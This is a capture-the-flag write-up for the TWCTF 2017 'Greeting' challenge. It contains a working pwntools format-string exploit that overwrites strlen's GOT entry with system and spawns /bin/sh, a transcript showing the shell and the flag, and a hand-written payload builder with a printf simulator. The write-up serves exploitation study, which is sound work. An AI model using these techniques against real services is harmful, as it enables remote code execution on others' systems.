TWCTF 2017 Greeting (150)

Problem

We are given the binary greeting, which is run as a network service.

Solution

The name we send is handed straight to printf as the format string (the characters printed before it on that call are what start_len=18 accounts for), which gives us an arbitrary write. The script below does two writes in a single payload: the pointer at 0x8049934 (pr in the script, presumably the pointer the program calls on its way out of main) is rewritten to main, so the program asks for a name a second time, and strlen's GOT entry at 0x8049a54 is rewritten to system's PLT stub, so the second name is passed to system instead of strlen. Sending /bin/sh on the second round then gives a shell.

import sys
from libformatstr import FormatStr
from pwn import *

# Addresses taken from the greeting binary (32-bit, no PIE).
pr = 0x8049934        # pointer rewritten to main so main runs a second time
nao = 0x8048742       # not used by the exploit
main = 0x80485ed
strlen = 0x8049a54    # strlen's GOT entry
system = 0x08048496   # system's PLT stub

# No argument: talk to a local copy (launch.sh listening on port 5000);
# any argument: the CTF server.
local = len(sys.argv) == 1
if not local:
    s = remote('pwn2.chal.ctf.westerns.tokyo', 16317)
else:
    s = remote('127.0.0.1', 5000)
print(s.recvline())
print(s.recv(30))

# Round 1: one format string that performs both writes.
p1 = FormatStr()
p1[pr] = main         # main is entered again after the first round
p1[strlen] = system   # strlen(name) becomes system(name) in the second round
offset = 12           # stack argument index of the first aligned word of our buffer
padding = 2           # our buffer starts 2 bytes into that word
start_len = 18        # characters printed before our string on the same printf call
round1 = p1.payload(offset, padding, start_len)
print(round1)
s.sendline(round1)
log.info("round1 sent!")
s.recvline(timeout=10)

# Round 2: main runs again and the name now reaches system().
s.sendline(b"/bin/sh")
s.interactive()
s.close()

Running the exploit (the non-printable bytes at the end of the payload are the four target addresses):

[+] Opening connection to pwn2.chal.ctf.westerns.tokyo on port 16317: Done
Hello, I'm nao!

Please tell me your name... 
%2034c%22$hn%23$hn%31890c%24$hn%343c%25$hn6\x99\x0V\x9a\x0T\x9a\x04\x99\x0
[*] round1 sent!
[*] Switching to interactive mode
Please tell me your name...
$ ls
flag
greeting
launch.sh
$ cat flag
TWCTF{51mpl3_FSB_r3wr173_4nyw4r3}
[*] Interrupted
[*] Closed connection to pwn2.chal.ctf.westerns.tokyo port 16317
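To see what libformatstr does for us, here is an added example that builds the same %Nc / %k$hn write-what-where payload by hand and then checks it against a small model of how printf counts characters and performs the %hn stores. It is not code from the writeup or from the libformatstr project; the helper names, the model of the 32-bit stack layout and the second set of targets in the test are the example's own. With the script's addresses and offset=12, padding=2, start_len=18 it reproduces the payload printed above byte for byte.

```python
import re
import struct

# Values from the exploit script above (taken from the greeting binary).
MAIN = 0x080485ed
SYSTEM_PLT = 0x08048496
EXIT_PTR = 0x08049934     # "pr" in the script: rewritten to main
STRLEN_GOT = 0x08049a54   # strlen's GOT entry: rewritten to system


def halfwords(writes):
    """Split each 32-bit write into two (address, 16-bit value) pairs and
    sort them by value, so every %Nc width stays below 0x10000."""
    out = []
    for addr, value in writes.items():
        out.append((addr, value & 0xffff))
        out.append((addr + 2, (value >> 16) & 0xffff))
    return sorted(out, key=lambda h: h[1])


def build_fmt_write(writes, offset, padding=0, start_len=0):
    """Write-what-where payload of %Nc / %k$hn pairs, laid out like
    libformatstr does: specifiers first, then filler, then the addresses.

    offset    - printf argument index of the first 4-byte-aligned word of
                our buffer
    padding   - how many leading bytes of the buffer belong to the word
                before `offset` (0..3)
    start_len - characters printf has already emitted when it reaches us
    """
    halves = halfwords(writes)
    fmt_len = 0
    for _ in range(16):
        # The argument indices depend on the length of the specifier text,
        # and the text depends on the indices: iterate to a fixed point.
        filler = (padding - fmt_len) % 4
        first_idx = offset + (fmt_len + filler - padding) // 4
        printed = start_len
        spec = b""
        for i, (_, value) in enumerate(halves):
            need = (value - printed) % 0x10000
            if need:                               # %Nc emits exactly N chars
                spec += b"%%%dc" % need
                printed += need
            spec += b"%%%d$hn" % (first_idx + i)   # store low 16 bits of count
        if len(spec) == fmt_len:
            break
        fmt_len = len(spec)
    else:
        raise ValueError("specifier length did not converge")
    addrs = b"".join(struct.pack("<I", addr) for addr, _ in halves)
    payload = spec + b"A" * filler + addrs
    if b"\x00" in payload or b"\n" in payload:
        raise ValueError("payload contains a byte the input routine would cut at")
    return payload


SPEC = re.compile(rb"%(\d+)c|%(\d+)\$hn")


def simulate_printf(payload, offset, padding=0, start_len=0):
    """Model of printf on a 32-bit stack where the payload itself is the
    argument area: count emitted characters and record every %k$hn store
    as {address: halfword}."""
    base = (4 - padding) % 4             # byte where argument `offset` starts

    def arg(k):
        pos = base + (k - offset) * 4
        return struct.unpack("<I", payload[pos:pos + 4])[0]

    count, mem, i = start_len, {}, 0
    while i < len(payload) and payload[i] != 0:   # printf stops at a NUL byte
        m = SPEC.match(payload, i)
        if m and m.group(1):                      # %Nc
            count += int(m.group(1))
        elif m:                                   # %k$hn
            mem[arg(int(m.group(2)))] = count & 0xffff
        else:                                     # ordinary byte, printed as-is
            count += 1
        i = m.end() if m else i + 1
    return mem


def recovered_words(mem, writes):
    """Reassemble each 32-bit target from its two halfword stores."""
    return {addr: mem[addr] | (mem[addr + 2] << 16) for addr in writes}


if __name__ == "__main__":
    writes = {EXIT_PTR: MAIN, STRLEN_GOT: SYSTEM_PLT}
    p = build_fmt_write(writes, offset=12, padding=2, start_len=18)
    print(p)
    result = recovered_words(simulate_printf(p, 12, 2, 18), writes)
    print({hex(a): hex(v) for a, v in result.items()})
```

Two details are worth keeping in mind when writing such a payload by hand. Sorting the halfwords by value means the character count only ever has to grow, so each %Nc width stays under 65536 and the whole thing fits in a few tens of kilobytes of output. The plain %Nc specifiers each consume an argument as well, but since every store uses an explicit k$ index it does not matter which argument they read. The builder also refuses a payload containing a NUL or newline, since the name is read as a string and either byte would truncate it before the addresses.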

Summary

Tools

  • libformatstr
  • pwntools

Vulnerability

  • Format string vulnerability
